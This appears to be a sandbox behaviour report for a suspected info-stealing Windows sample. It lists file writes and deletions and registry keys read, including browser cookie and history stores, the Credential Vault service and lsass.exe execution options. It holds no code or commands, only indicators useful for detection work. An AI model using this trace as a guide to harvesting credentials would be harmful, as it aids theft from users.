C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
Write Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\J94P8C89\J94logim.jpeg
Delete Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OYA.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\AuthenticodeEnabled HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\vbc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisableLocalOverride HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\systray.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\AuthenticodeEnabled HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisableLocalOverride HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet 